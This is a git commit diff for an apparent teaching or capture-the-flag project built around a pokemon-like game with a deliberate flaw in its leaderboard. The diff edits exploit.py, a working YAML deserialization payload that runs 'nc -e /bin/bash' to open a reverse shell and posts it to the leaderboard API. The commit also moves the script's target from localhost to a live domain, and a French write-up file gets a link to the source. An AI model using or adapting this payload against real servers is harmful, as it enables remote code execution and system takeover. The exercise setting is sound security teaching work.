Add uncommited documents

2025-12-14 19:52:49 +01:00
parent 1fd92f2492
commit a0d1be96b6
2 changed files with 3 additions and 2 deletions
--- a/exploit.py
+++ b/exploit.py
@@ -3,7 +3,8 @@ import requests
 malicious_yaml = """
 !!python/object/apply:os.system ["nc -e /bin/bash 127.0.0.1 1111"]
 """
-url = "http://127.0.0.1:8080/api/leaderboard"
+#url = "http://127.0.0.1:8080/api/leaderboard"
+url = "http://libremon.furtest.fr/api/leaderboard"
 headers = {
    "Content-Type": "text/yaml"
 }
--- a/faille.md
+++ b/faille.md
@@ -4,7 +4,7 @@ Nous avons réalisé un jeu pokemon-like où les logiciels libres et propriétai

 La faille est intégré dans le leaderboard, pour des raisons de sécurité elle est désactivé sur le serveur mais vous pouvez la trouvez en téléchargant les sources du site au lien suivant.

-LIEN
+https://share.furtest.fr/app/open/8v6M1zn6FZn-qUTvevvP8Wc-LFiYonS6ZTo-wYG6RmQWCXu?view=1

 # Fonctionnement de la faille